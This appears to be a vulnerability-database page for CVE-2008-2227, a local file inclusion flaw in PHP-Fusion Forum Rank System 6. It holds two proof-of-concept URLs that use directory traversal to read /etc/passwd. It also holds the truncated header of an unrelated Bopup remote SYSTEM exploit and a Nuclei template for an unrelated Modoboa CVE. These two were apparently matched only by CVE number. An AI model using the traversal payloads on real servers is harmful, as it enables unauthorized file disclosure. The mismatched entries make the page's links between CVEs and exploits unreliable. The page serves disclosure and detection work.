CVE-2008-2227
Published 2008-05-14
Priority P432 · medium · 6.8 CVSS 2.0
AV:N/AC:M/Au:N/C:P/I:P/A:P
EXPLOIT
EPSS: 1.85% (76.5th percentile)
Multiple directory traversal vulnerabilities in PHP-Fusion Forum Rank System 6 allow remote attackers to include and execute arbitrary local files via a .. (dot dot) in the settings[locale] parameter to (1) forum.php and (2) profile.php in infusions/rank_system/. NOTE: the provenance of this information is unknown; the details are obtained solely from third party information.
Affected
1 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| php-fusion | forum_rank_system | — | — |
No detection rules found.
Exploit-DB
Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
exploitdb·2009-06-22
CVE-2009-2227 Bopup Communications Server 3.2.26.5460 - Remote SYSTEM
---
/* bopup-down.c
*
* Copyright (c) 2008 by
*
* Bopup Communications Server remote SYSTEM exploit
* by mu-b - Sat Feb 08 2008
*
* - Tested on: Bopup Communications Server 3.2.26.5460 (Mar 18 2009)
*
* .text:00407A17 lea eax, [ebp+pkt_0x19]
* .text:00407A1D push eax
* .text:00407A1E lea eax, [ebp+var_354]
* .text:00407A24 push eax
* .text:00407A25 call _strcpy
*
* note: this is updated over time for newer versions, I can't be bothered
* making it universal nor anything else...
*
* - Private Source Code -DO NOT DISTRIBUTE -
* http://www.digit-labs.org/ -- Digit-Labs 2008!@$!
*/
#include
#include
#include
#include
#include
#include
#include
#define BUF_SIZE 2048
#define BOPUP_STR_OFFSET 0x19
#define BOPUP_STR_LEN 0x348+8
#define
Exploit-DB
Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions
exploitdb·2008-05-07
CVE-2008-2227 Forum Rank System 6 - 'settings['locale']' Multiple Local File Inclusions
---
source: https://www.securityfocus.com/bid/29077/info
Forum Rank System is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker can exploit these vulnerabilities using directory-traversal strings to view files and execute local scripts in the context of the webserver process. This may aid in further attacks.
Forum Rank System 6 is vulnerable; other versions may also be affected.
http://www.example.com/infusions/rank_system/forum.php?settings[locale]=../../../../../../../../etc/passwd%00
http://www.example.com/infusions/rank_system/profile.php?settings[locale]=../../../../../../../../etc/passwd%00
Nuclei
Modoboa < 2.1.0 - Improper Authorization
nuclei·CVSS 9.1
CVE-2023-2227 [CRITICAL] Modoboa < 2.1.0 - Improper Authorization
Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
Template:
id: CVE-2023-2227
info:
  name: Modoboa < 2.1.0 - Improper Authorization
  author: ritikchaddha,princechaddha
  severity: critical
  description: |
    Improper Authorization in GitHub repository modoboa/modoboa prior to 2.1.0.
  impact: |
    Unauthenticated attackers can access sensitive configuration parameters including default passwords and authentication settings through the API endpoint, potentially compromising the entire email management system.
  remediation: |
    Update Modoboa to version 2.1.0 or later that implements proper authorization checks for the parameters API endpoint.
  reference:
    - https://huntr.com/bounties/351f9055-2008-4af0-b820-01ff66678bf3
    - https://github.c
No writeups or analysis indexed.
http://secunia.com/advisories/30304
http://www.securityfocus.com/bid/29077
http://www.securityfocus.com/bid/29077/exploit
https://exchange.xforce.ibmcloud.com/vulnerabilities/42244
Published: 2008-05-14